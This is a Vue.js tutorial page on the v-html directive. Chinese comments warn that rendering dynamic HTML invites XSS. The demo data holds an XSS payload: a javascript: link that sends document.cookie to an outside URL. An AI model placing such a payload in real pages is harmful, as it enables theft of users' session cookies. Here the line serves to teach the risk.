<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script type="text/javascript" src="../vue.js"></script>
    <script type="text/javascript" src="../day.js"></script>
    <title>Document</title>
</head>
<body>
    <!-- 
        v-html指令
            1.作用: 向指定节点中渲染包含html结构的内容
            2.与插值语法的区别:
                (1).v-html会替换掉节点中所有内容,{{xx}}不会
                (2).v-html可以识别html结构
            3.严重注意: v-html有安全性问题
                (1).在网站上动态渲染html是非常危险的,容易导致xss攻击
                (2).一定要在可信的内容上使用v-html,永远不要在用户提交的内容上
     -->
    <div id="root"> 
        <div>你好,{{name}}</div>
        <div v-html="str"></div>
        <div v-html="str2"></div>
    </div>

    <script>
        Vue.config.productionTip = false



        new Vue({
            el:'#root',
            data: {
                name: '啊实打实的',
                str: '<h3>你好啊!</h3>',
                str2: '<a href=javascript:location.href="https://www.baidu.com?"+document.cookie>你好啊!</a>'
            },

        })

    </script>

</body>
</html>







